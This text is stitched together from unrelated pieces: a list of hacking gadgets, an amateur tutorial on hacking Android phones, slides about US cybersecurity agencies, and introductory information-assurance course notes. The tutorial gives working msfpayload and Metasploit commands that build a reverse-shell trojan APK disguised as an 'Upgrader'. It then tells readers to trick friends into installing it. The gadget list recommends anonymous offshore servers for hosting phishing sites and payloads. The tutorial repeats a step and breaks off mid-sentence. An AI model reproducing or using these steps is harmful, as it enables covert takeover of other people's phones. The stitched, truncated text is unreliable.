10 Essentials Gadgets Every Hacker Should Try

1. Mousejacking Exploit Antenna

In 2016, the security firm Bastille made headlines when it reported its research on
wireless keyboard and mouse vulnerabilities. Dubbed "mousehacking," these
vulnerabilities allow an attacker (up to 300 feet away) to take control of a target
computer without needing physical access. These attacks allow for remote keystroke
injections by letting penetration testers anonymously pair their device to a target
computer that is using popular wireless keyboard adapters (shown below).

This attack is made possible due to keyboard vendors (Logitech and Dell) failing to
encrypt data transmissions between the keyboard and USB adapter or failing to
properly authenticate devices communicating with the adapter. It's been over two
years since the vulnerabilities were disclosed but there are reportedly more than a
billion affected devices worldwide as Logitech and Dell are extremely popular
manufactures of wireless keyboards.

For more information on this attack, check out Bastille's official website for a list
of affected devices and technical details.

The "Crazyradio USB Dongle" used in these attacks is a 2.4 GHz bi-directional
transceiver which can send and receive radio telemetry. Essentially, this USB
dongle is capable of observing, recording, and injecting wireless radio waves.

2 GPUs for Password Cracking

A graphics processor (GPU) is chip, usually embedded in an internal graphics card
attached to a computer's motherboard, designed to efficiently process images and
alter memory in smartphones, personal computers, and gaming consoles. GPUs
are responsible for all of the video and image rendering on our electronic devices.

Hackers repurpose GPU technologies and build dedicated "cracking rigs" to

enhance password brute-forcing attacks with Hashcat. This kind of usage is
demonstrated in Tokyoneon's "Hack 200 Online User Accounts in Less Than 2
Hours" article, where he compromised hundreds of Twitter, Facebook, and Reddit
accounts by using a GPU to crack hashes found in a leaked password database.

GeForce graphics cards are a great starting point for hackers who are considering
building a dedicated brute-force machine. At just $189, the GeForce GTX 1050 Ti is
a good starter GPU.

3The World's Smallest Laptops

The GPD Pocket has been dubbed "the world's smallest laptop," which is an
interesting option for white hats and pentesters always on the go. It features the
Intel Atom X7, 1920 x 1080 resolution, and 8 GB of RAM packed into a small-sized
laptop that's only a bit larger than most modern smartphones (shown below).

Pocket-sized PCs are growing in popularity due to their small size, physical
keyboards, ability to handle high-performance games, and Intel CPUs which are
superior to ones found in Raspberry Pis and smartphones.

Pentesters can easily install a variety of Linux operating systems on this device
including Ubuntu, Kali Linux, and BlackArch in place of the default Windows 10.

If you're looking for a bit more power in a slimmer laptop, the latest GPD Pocket
2 features better hardware specs and is 50% thinner than the previous model.

4The Latest Raspberry Pi

The Raspberry Pi 3 Model B+ was released this year featuring a slightly faster CPU,
upgraded Wi-Fi and Ethernet modules, and can be powered without a traditional
power adapter using the Ethernet port (with a PoE HAT).

Null Byte has covered how to build a hacking Raspberry Pi, use VNC to remotely
access it, and create a portable pentesting Pi box, to name just a few tutorials.
Using a Raspberry Pi as a hacking tool has been covered at length, so I'll move on.

5The USBarmory
The USB Armory is a computer about the size of a USB flash drive designed to
deliver a number of advanced security features. It was built to support the
development of several security software and applications while reducing power
consumption. As per the developer's keynote at FSec 2016, the USB Armory can
be used for:

 file storage with advanced features such as automatic encryption, virus

scanning, host authentication, and data self-destruct
 OpenSSH client and agent for untrusted hosts
 router for end-to-end VPN tunneling
 password manager with an integrated web server
 electronic wallet (e.g., Bitcoin wallet)
 authentication token
 portable penetration testing platform
 low-level USB security testing
It also has excellent support for Ubuntu, Debian, and Android operating systems.
For an in-depth look at the USB Armory, check out the official
website and documentation.

6VPS Subscriptions
A virtual private server (VPS) is a computer we can control remotely from any
internet-connected device in the world. Adding a reliable VPS subscription to your
arsenal is essential to any penetration tester and professional security researcher.
From a remote VPS, penetrations testers can:

 host payloads for hacking macOS and Windows 10

 securely sync files
 create IRC bots
 host phishing websites
 perform password brute-force reuse attacks
 host USB drop payloads
 use advanced Nmap scripts
 create server proxies
 create onion websites
 host Metasploit sessions
Our favorite for white hats and pentesters is BulletShield since it does not require
or request any personal info when registering or paying, offers offshore solutions,
and has a Tor-friendly website, among other things. Check out the full guide to
picking the right VPN below for more info.

7Hak5 Gear
Hak5 is an award-winning podcast that offers immersive information security
training and renowned penetration testing gear. Below are some of the excellent
tools Hak5 has to offer.

The USB Rubber Ducky

The USB Rubber Ducky is Hak5's USB keystroke injection tool capable of executing
payloads at over 1,000 words per minute. It can be used to hack a macOS device in
less than 5 seconds, disable antivirus software, or social engineer someone into
plugging it into their computer.

Bash Bunny
The Bash Bunny is a multi-functional USB attack tool similar to the USB Rubber
Ducky. However, the Bash Bunny is a full-featured Linux operating system which
gives it a number of advantages over the USB Rubber Ducky such as carrying
multiple advanced payloads, emulating a combination of devices, and performing
numerous advanced attacks. Penetration testers with a need to take their physical
attacks to the next level will appreciate this one.

Packet Squirrel
The Packet Squirrel is a pocket-sized man-in-the-middle attack tool designed for
covert packet capturing and secure remote access to target networks. Ports on
this small network implant include a USB and Ethernet.
LAN Turtle
The LAN Turtle is a covert penetration testing tool great for network intelligence
gathering, advanced surveillance, and man-in-the-middle attacks all available via a
graphical shell. It ships equipped with SIM (3G) functionalities and a modular
framework that allows hackers to very easily execute and automate advanced
network attacks.

WiFi Pineapples
The WiFi Pineapple and WiFi Pineapple Nano are excellent rogue access
point and Wi-Fi auditing devices. Their suite of Wi-Fi auditing tools is designed to
make reconnaissance, man-in-the-middle attacks, and hacking wireless networks
quick and painless. Best of all, all of these features can be accessed using any
phone or web browser via the easy-to-use graphical interface.

8Standard Wi-Fi Hacking Adapter

Wi-Fi hacking is a popular topic among penetration testers. Our ability
to compromise wireless networks with ease is an essential skill. So a wireless
adapter is something you can't do without, preferably one that's Kali-compatible.
Some choices that are worth looking into include

9Long-Range Wi-Fi Hacking Antenna

If standard Wi-Fi hacking antennas aren't getting the job done, increasing the
signal coverage and range with a bigger antenna will allow us to compromise
routers much further away.

The Tupavco TP512 Yagi Wi-Fi Directional Antenna has customer reviews reporting
up to 300 feet of range. Some reports online claim up to 1 mile of range where an
unobstructed line of sight to the target router is permitted. There are other
vendors selling similar Yagi products and bundles. For example, ALFA's Yagi
Antenna includes an ALFA hacking chipset and the necessary cable adapter.

10Hacking with Drones

With drone racing rising in popularity over the last few years, these small
quadcopters are quickly becoming the DIY-hackers gadget of choice.

Project Cuckoo is the Watch Dogs-inspired pentesting drone, created by the

hacker known as "Glytch." This 3D-printed drone features an attached WiFi
Pineapple Nano which allows it to perform man-in-the-middle attacks and inject
malicious JavaScript into Wi-Fi hotspots as well as stealthfully sniff Wi-Fi activity
without connecting to the router.
In upcoming Null Byte articles, we'll be talking about building our own affordable
hacking drone and demonstrating all of the unique scenarios penetration testers
can utilize with such devices.

3D printers on Amazon (of decent quality) start at around $299. Add the price of
the materials, individual drone components, and a remote control — that's well
over $500 spent building a hacking drone from scratch. If you're looking for a
quicker solution or lack the patience to deal with the technical ins and outs of 3D
printing and drone building, there are alternatives.

The DJI Spark Drone is a small, lightweight drone that includes a remote control
for a total of $399. With up to 15 minutes of flight time, a range of up to 1.2 miles,
and an attached 12 MP 1080p video camera, this is possibly the best, most
affordable little drone currently on the market.

If your budget allows for a wider range of drones, the "DJI Mavic Drone" may be a
better option. It features a higher resolution camera, up to 2.4 miles of range, 8
GB of internal storage (for video recording), 3-axis mechanical gimbal (for
improved stability), and over 20 minutes of flight time.

Bonus: E-Books & Learning Materials

While e-books aren't physical gadgets, I thought this was worth mentioning as
every penetration tester should have a healthy supply of learning resources at their
disposal.

Null Byte is an excellent repository for learning how to use Metasploit as well as
how to hack macOS and Windows 10. However, e-books and certification exam
preparation cookbooks contain vast amounts of information. These materials are
often created by veteran pentesters with over a decade of hands-on professional
experience. Novice hackers who have prepared for any kind of ethical hacking
exam will tell you how valuable these learning materials can be.

A variety of learning materials can sometimes be found for free on websites like
"All IT eBooks." While some of these e-books are several years old, they still
contain relevant and useful information. Other (non-free) titles include:

 The Hacker Playbook 3: Practical Guide To Penetration Testing

 CompTIA Network+: Certification All-in-One Exam Guide, Seventh Edition
 CompTIA CySA+: Cybersecurity Analyst Certification All-in-One Exam Guide
 CEH: Certified Ethical Hacker Bundle, Third Edition (All-in-One)
 CompTIA PenTest+: Certification All-in-One Exam Guide
 CISSP: All-in-One Exam Guide, Eighth Edition
 Hash Crack: Password Cracking Manual
  Kali Linux Web Penetration Testing Cookbook: Identify, exploit, and
prevent web application vulnerabilities with Kali, 2nd Edition
What Are Your Picks for Essential Hacking Gear?
We tried to compile a diverse list of hacking tools and gadgets intermediate
penetration testers might appreciate. If you're looking to explore weaponized
hacking drones, extend the range of your Wi-Fi router hacks, or dive deeper into
password cracking, the featured gadgets should provide a good starting point.

This list of hacker gear might not appeal to everyone, however. Did we miss any
noteworthy or new gizmos hackers should know about? Be sure to leave a
comment below with your picks for the essential gadgets hackers should try!

Hack Androids using Kali

Hello Hackers! Welcome to my 2nd Post:

This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1Fire-Up Kali:

 Open a terminal, and make a Trojan .apk
 You can do this by typing :
 msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R >
/root/Upgrader.apk (replace LHOST with your own IP)
 You can also hack android on WAN i.e. through Interet by using
your Public/External IP in the LHOST and by port forwarding (ask me about
port forwarding if you have problems in the comment section)

Step 2Open Another Terminal:

 Open another terminal until the file is being produced.
 Load metasploit console, by typing : msfconsole

Step 3Set-Up a Listener:

 After it loads(it will take time), load the multi-handler exploit by
typing : use exploit/multi/handler

 Set up a (reverse) payload by typing : set payload

android/meterpreter/reverse_tcp
 To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN
type your private/internal IP here not the public/external)
Step 3Set-Up a Listener:
 After it loads(it will take time), load the multi-handler exploit by
typing : use exploit/multi/handler

 Set up a (reverse) payload by typing : set payload

android/meterpreter/reverse_tcp
 To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN
type your private/internal IP here not the public/external)

Step 4Exploit!
 At last type: exploit to start the listener.
 Copy the application that you made (Upgrader.apk) from the root folder, to
you android phone.
 Then send it using Uploading it to Dropbox or any sharing website
(like: www.speedyshare.com).
 Then send the link that the Website gave you to your friends and exploit
their phones (Only on LAN, but if you used the WAN method then you can
use the exploit anywhere on the INTERNET)
 Let the Victim install the Upgrader app(as he would think it is meant to
upgrade some features on his phone)
 However, the option of allowance for Installation of apps from Unknown
Sources should be enabled (if not) from the security settings of the android
phone to allow the Trojan to install.
 And when he clicks Open...

Step 5BOOM!
There comes the meterpreter prompt:
EECS 710: Information Security and Assurance

Contents
-Department of Justice –CCIPS
-Department of Justice – FBI
-National Security Agency – NSA
-Department of Homeland Security
-CMU/SEI Coordination Center
-Conclusion

Department of Justice - CCIPS

*Computer Crime and Intellectual Property Section -

http://www.justice.gov/criminal/cybercrime/
*CCIPS prevents, investigates, and prosecutes computer crimes.
*Goal is to protect Intellectual Property (IP)
*Case highlights include U.S. v. Microsoft Antitrust case and Author’s Guild,
INC. v. Google INC.
*Provides IP Victim Guide on how to report intellectual property crimes as
well as a manual for prosecuting IP crimes and computer crimes.
*Leadership is John Lynch, Chief Computer Crime & Intellectual Property
Section.

Department of Justice - FBI

*InfraGard program developed in 1996 as partnership between private and

public sectors to protect U.S. critical infrastructure and resources.
*InfraGard works well since most Infrastructure components like utility
companies, transportation, telecomm, water, and food suppliers are
privately owned.
*InfraGard began with a focus on cyber crime but now encompasses
computer, physical and other security breaches.
*FBI agent serves as coordinator between companies to evaluate threats
and impacts on their respective companies.
*Companies use FBI resources such as an encrypted website, webmail, list
serves, and message boards to communicate and share case information.
*FBI provides an Internet Crime Complaint Center (IC3) targeting internet
crime investigations http://www.ic3.gov/default.aspx
*IC3 is a partnership between the FBI and the National White Collar Crime
Center (NW3C)
*IC3 handles complains regarding IP rights, computer intrusions, economic
espionage, online extortion, internet money laundering, identity theft, and
more.
*IC3 offers Internet Crime Prevention Tips and Schemes as well as a FAQ
and Consumer Alerts.
*IC3 website allows visitors to file a complaint online to the FBI and have
their claim investigated.
National Security Agency - NSA
*The National Security Agency (NSA) operates an Information Assurance
Directorate (IAD) to protect National Security Information Systems (any
system critical to military or intelligence activities)

*The IA program provides guidance to businesses as well as the TEMPEST

Certification Program which tests and certifies products.

*IA features an Academic Outreach program which focuses on promoting

higher education an research in IA to protect the nation’s infrastructure.

*The IA provides a Business Affairs Office and has many partnerships with
the private industry.

*Provides the Commercial COMSEC Evaluation Program (CCEP) for product

development to meet IA standards.

Department of Homeland Security

*The National Protection and Programs Directorate is developed to protect

and enhance the resilience of the nation’s physical and cyber
infrastructure.

*NPPD has four divisions: Federal Protective Service (FPS), Office of

Cybersecurity and Communications (CS&C), Office of Infrastructure
Protection (IP), and US-VISIT.

*National Infrastructure Protection Plan (NIPP) is operated by DHS to

protect the nation’s critical infrastructure by providing a framework for
security efforts.

*Mission is to lead the federal government in securing civilian and industry

computer systems as well as government and critical infrastructure
systems.

*DHS created a Stop.Think.Connect Campaign effort in 2009 for public

awareness of cyber threats and to provide resources and effective tips for
preventing attacks.

*Obama designated the month of October as National Cyber Security

Awareness Month (NCSAM) to promote awareness of cyber threats.

*Stop.Think.Connect provides a toolkit with tipsheets, presentations,

videos, press releases, fact sheets, and social media contacts for
educators, industry, and both young and older
*US CERT (United States Computer Emergency Readiness Team) provides
information and tips for cyber security as well.

*US-CERT’s mission is to improve the nation’s cybersecurity posture,

coordinate cyber information sharing, and proactively manage cyber risks
to the nation while protecting constitutional rights of Americans.

*US-CERT provides a feed of current industry activities relating to cyber

security as well as recent vulnerabilities and methods to mitigate the
vulnerabilities.

*US-CERT provides a hotline and 24x7 operations center to respond to

security incidents as well as provide technical assistance and notifications.

*US-CERT partners with both private sector, academic institutions, federal

agencies and the Information Sharing and Analysis Centers (ISACs)

*The National Security Telecommunications Advisory Committee (NSTAC)

was created by the DHS to provide the U.S. Government the best possible
industry advice in the areas of the availability and reliability of
telecommunications services.

*The NSTAC has been around for over 30 years with partnerships in the
telecommunications and aerospace companies.

*Addresses such issues as the convergence of traditional and broadband

networks, the changing global threat environment, and the continuing
global expansion of provider and user communities.

*Five key themes: strengthening national security, enhancing cybersecurity,

maintaining the global communications infrastructure, assuring
communications fro disaster response, and addressing critical
infrastructure interdependencies.

CMU/SEI CERT Coordination Center

*CERT Coordination center is located at Carnegie Mellon University and

studies internet security vulnerabilities, researches long-term changes in
networked systems, and develops information and training for improved
security.

*CERT.org offers both training courses and certifications for professionals

interested in cyber security.

*CERT.org will analyze programming code that is submitted to identify

vulnerabilities in the early stages of development saving time and effort
for programmers.
*CERT.org also provides information on securing network systems as well
as managing risk and governance of organizational security.

*Similar to the DHS Cert team CERT.org also provides a response team
available to assist with security issues.

Conclusion

*There are many agencies and websites that are both government and
private sector that provide valuable resources for cyber security.

*Learn how to use the tools provided and contact the agencies in the event
of a cyber crime.

An Introduction to Information Assurance

Reading Assignment

Read section 3 of faq

-http://www.w3.org/Security/Faq/

-CERT is a coordination center for Internet

security operated by Carnegie Mellon.
Read CERT article on security
http://www.cert.org/encyc_article/tocencyc.html

-This course is part of the SCU Information

Assurance curriculum which was recently
certified by the Committee on National
Systems Security of the National Security
Agency as meeting the standards of the
National INFOSEC Education and Training
Program.

4011 Certificate Requirements

-BSCE: AMTH 387, COEN 250; 12 units

from COEN 150, 178, 252, 253, 350, 351;
and approved senior design project.

-MSCE: AMTH 387, COEN 250, 252, 253,

351 and either COEN 350, 254, or 352.

Terminology Overview
-Attacks, Services and Mechanisms
-Security Services
-Threats, Attacks and Vulnerabilities
-Security Policies and Mechanisms for Defense
-Readings, standards, etc.

Definitions

-Security Attack: Any action that compromises

the security of information.

-Security Mechanism: A mechanism that is

designed to detect, prevent, or recover from a
security attack.

-Security Service: A service that enhances the

security of data processing systems and
information transfers. A security service makes
use of one or more security mechanisms.

Security Services (Goals)

*Confidentiality – concealment of
information or resources. Includes
whether or not data exists. Implies
“authorization” so that only authorized
people can access confidential data.

*Integrity – the trustworthiness and the

correctness of data or resources.

Usually in terms of preventing improper or

unauthorized change.

-Can have several types of integrity: data

integrity and origin integrity

Was the email spoofed?

Two types of integrity services: prevention and

detection.

*Availability – the ability of authorized

entities to use the information or resource.
Denial of service attacks inhibit this
service

*CIA: Confidentiality, Integrity, Availability

Vulnerabilities, Threats and
Attacks
-A vulnerability is a weakness in the
system that might be exploited to cause
loss or harm (and a violation of security
services).

-A threat is a potential violation of

security. Security services counter
threats.

-An attack is the actual attempt to violate

security. It is the manifestation of the
threat.

Classifying Communication Attacks

Types of Attacks

-Interruption: This is an attack on

availability

-Interception: This is an attack on

confidentiality

-Modification: This is an attack on integrity

-Fabrication: This is an attack on integrity

-Additional Threats/Attacks

-Repudiation of origin – a false denial that an entity

sent or created something (I didn’t send that order to
but Enron stock the day before it crashed). Attack on
integrity

-Denial of receipt – a false denial that an entity

received some information or message. (I didn’t
receive the diamond shipment). Attack on integrity
and availability.

-Denial of Service – long term inhibition of

information or service. Attack on availability.

Passive and Active Threats

Passive - Release of message contents, Traffic Analysis
Active Threats - masquerade, Replay, Modification of message contents, Denial of
Services
Security Policy and Mechanisms

A security policy is a statement of what is

and is not allowed.

A security mechanism is a method, tool, or

procedure for enforcing security policy.

These should clearly be separate things.

Policy and Mechanism Example

Policy – only the systems administrator is

allowed to access the password file and then
only in encrypted form

Mechanism – the password file is not stored in

clear text, but only in encrypted form with
algorithm XYZ. The O.S. checks the access
authorization of any process attempting to read
the password file immediately before the access;
whenever access is denied, that attempt is
recorded in a log of suspicious activity.

Security Mechanisms

Prevention, Detection, Recovery

Prevention:

Encryption

Software Controls (DB access limitations,

operating system process protection)

Enforce policies (frequent password change)

Physical Controls

Detection: Intrusion detection systems (IDS)

Prevention Mechanisms

Adequate prevention means that an attack will

fail. Prevention usually involves mechanisms
that the user cannot override.
Prevention mechanisms are often cumbersome
and do not always work perfectly or fail because
they are circumvented.

Passwords are a prevention mechanism to

prevent unauthorized access. They fail when
the password becomes known to a person other
than the owner.

Detection Mechanisms

Detection is used when an attack cannot be

prevented and it also indicates the effectiveness
of prevention measures.

The goal is to determine that an attack is

underway or has occurred and report it.

Audit logs are detection mechanisms. When you

log into the design center’s unix servers, it gives
you the IP address of the last successful login.

Recovery

Recovery has several aspects. The first is to

stop an attack and repair the damage.

Another is to trace the evidence back to the

attacker and discover the identity of the
attacker (this could result in legal retaliation).

Yet another aspect is to determine the

vulnerability that was exploited and fix it or
devise a way of preventing a future attack.

Example: Private Property

Prevention: locks at doors, window bars,

walls round the property

Detection: stolen items are missing,

burglar alarms, closed circuit TV

Recovery: call the police, replace stolen

items, make an insurance claim …

Example E-Commerce
Prevention: encrypt your orders, rely on the
merchant to perform checks on the caller, don’t
use the Internet (?) …

Detection: an unauthorized transaction appears

on your credit card statement

Recovery: complain, ask for a new card

number, etc.

Footnote: Your credit card number has not been

stolen. Your card can be stolen, but not the
number. Confidentiality is violated.

Problems with Security

Mechanisms

Laws and Customs - is it legal? Might not be

legal to retaliate against an attacker.

Is it acceptable practice? How many hoops

do we have to jump through to authenticate?

Is it convenient? Users with security needs

are often not aware of vulnerabilities and will
not put up with excessive cost and
inconvenience.

Other Terminology

CompuSec: computer security (protect

computers and the information in them)

ComSec: communication security (protect

information as it is transmitted)

OpSec: operations security (security

policies and procedures)